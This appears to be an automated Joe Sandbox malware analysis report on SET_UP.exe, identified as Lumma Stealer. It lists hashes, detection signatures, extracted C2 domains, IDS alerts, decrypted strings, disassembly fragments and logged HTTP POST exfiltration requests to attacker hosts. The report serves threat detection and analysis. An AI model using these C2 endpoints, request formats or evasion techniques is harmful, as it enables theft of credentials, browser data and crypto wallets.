Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name:SET_UP.exe
Analysis ID:1583049
MD5:c58fa8b1892d11fcce2893e637734a00
SHA1:2b9a6350ed380ba9d025dcdff6c11a6b7533138f
SHA256:3970f1b64c122f1d7917d4558747f4c91295f8d03b62cfa7ac0e5bf0f0c8b9a6
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SET_UP.exe (PID: 1104 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: C58FA8B1892D11FCCE2893E637734A00)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "rabidcowse.shop", "throwupset.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ELVIRA"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4d19d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: SET_UP.exe PID: 1104JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: SET_UP.exe PID: 1104JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: SET_UP.exe PID: 1104JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: SET_UP.exe PID: 1104JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:20:14.655175+010020283713Unknown Traffic192.168.2.449736104.21.112.1443TCP
              2025-01-01T17:20:15.692056+010020283713Unknown Traffic192.168.2.449737104.21.112.1443TCP
              2025-01-01T17:20:16.820091+010020283713Unknown Traffic192.168.2.449738104.21.112.1443TCP
              2025-01-01T17:20:18.115018+010020283713Unknown Traffic192.168.2.449739104.21.112.1443TCP
              2025-01-01T17:20:19.557334+010020283713Unknown Traffic192.168.2.449740104.21.112.1443TCP
              2025-01-01T17:20:21.017913+010020283713Unknown Traffic192.168.2.449742104.21.112.1443TCP
              2025-01-01T17:20:22.028591+010020283713Unknown Traffic192.168.2.449743104.21.112.1443TCP
              2025-01-01T17:20:22.974708+010020283713Unknown Traffic192.168.2.449744104.21.112.1443TCP
              2025-01-01T17:20:24.357688+010020283713Unknown Traffic192.168.2.449745185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:20:15.222766+010020546531A Network Trojan was detected192.168.2.449736104.21.112.1443TCP
              2025-01-01T17:20:16.176982+010020546531A Network Trojan was detected192.168.2.449737104.21.112.1443TCP
              2025-01-01T17:20:23.706583+010020546531A Network Trojan was detected192.168.2.449744104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:20:15.222766+010020498361A Network Trojan was detected192.168.2.449736104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:20:16.176982+010020498121A Network Trojan was detected192.168.2.449737104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T17:20:21.457529+010020480941Malware Command and Control Activity Detected192.168.2.449742104.21.112.1443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://cegu.shop/aDAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtZAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtackAvira URL Cloud: Label: malware
              Source: https://cegu.shop/9OFAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtFWVOAvira URL Cloud: Label: malware
              Source: SET_UP.exe.1104.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "tirepublicerj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "rabidcowse.shop", "throwupset.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ELVIRA"}
              Source: SET_UP.exeVirustotal: Detection: 16%Perma Link
              Source: SET_UP.exeReversingLabs: Detection: 15%
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: throwupset.click
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ELVIRA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC4BBF CryptUnprotectData,0_2_02DC4BBF
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4992E1F9h]0_2_024FC256
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_024DEA10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_024FAAF0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02506B60
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_024E930C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024E83CC
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_024D8BE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_024D8BE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_02510380
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp+04h], eax0_2_024E882D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024EC030
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024F78D0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-33h]0_2_024F78F0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h0_2_0250A080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h0_2_0250A080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then test eax, eax0_2_0250A080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp edx, esi0_2_0250A080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_024E58A1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_024E58A1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_024EE17F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov esi, ecx0_2_024EE17F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, ecx0_2_024EF970
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [ebx]0_2_024FB910
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [edi]0_2_024DA9C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [esi], al0_2_024EC9D5
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024F31F0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_024E9988
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_024F49B8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+12h]0_2_024F91B7
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh0_2_024E5643
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024FD60E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ah, dl0_2_024DF601
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h0_2_024F8ED4
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024FD584
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]0_2_0250C750
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_024DA750
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024F9F70
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_024ECF33
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h0_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000CFh]0_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+00000084h]0_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+0Ch]0_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_024EA780
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_024F3C56
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, ebx0_2_024E5418
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_024D4420
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp dword ptr [0044664Ch]0_2_024F84C8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_024E8CC1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [ebp+esi+02h], 0000h0_2_024F9489
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_02509510
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h0_2_02509510
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024F8D2A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+18h]0_2_024EC537
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, eax0_2_024DDDC5
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024EDDC2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_024FD5DA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DBD3CB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_02DEEB10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0DA2D2C1h]0_2_02DBC1F2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4992E1F9h]0_2_02DDA9E6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ecx0_2_02DBD1A0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_02DD3148
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]0_2_02DEAEE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_02DE7CA0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h0_2_02DE7CA0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, eax0_2_02DBC555
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02DE52F0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_02DC7A9C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02DD9280
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_02DD23E6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_02DB2BB0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, ebx0_2_02DC3BA8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DC6B5C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_02DDBB45
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02DB7370
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_02DB7370
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-33h]0_2_02DD6080
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [ebx]0_2_02DDA0A0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DD6060
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h0_2_02DE8810
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h0_2_02DE8810
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then test eax, eax0_2_02DE8810
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp edx, esi0_2_02DE8810
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02DC4031
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02DC4031
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DD1980
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [edi]0_2_02DB9150
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+12h]0_2_02DD7947
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [esi], al0_2_02DCB165
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_02DC8118
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_02DCC90F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov esi, ecx0_2_02DCC90F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, ecx0_2_02DCE100
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_02DCB6C3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_02DB8EE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h0_2_02DD7664
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DDBD14
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B1BF3DAh0_2_02DE8624
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DCA7C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp+04h], eax0_2_02DC6FBD
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp eax0_2_02DDB779
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h0_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000CFh]0_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+00000084h]0_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+0Ch]0_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DD8700
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+18h]0_2_02DCACC7
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DD74BA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp dword ptr [02DF664Ch]0_2_02DD6C5C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_02DC7451
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [ebp+esi+02h], 0000h0_2_02DD7C19
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh0_2_02DC3DD3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DDBD9E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ah, dl0_2_02DBDD91
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DCC552
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_02DDBD6A

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.112.1:443
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: throwupset.click
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.112.1:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: throwupset.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HISKUTTBY8PS7D5S4EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: throwupset.click
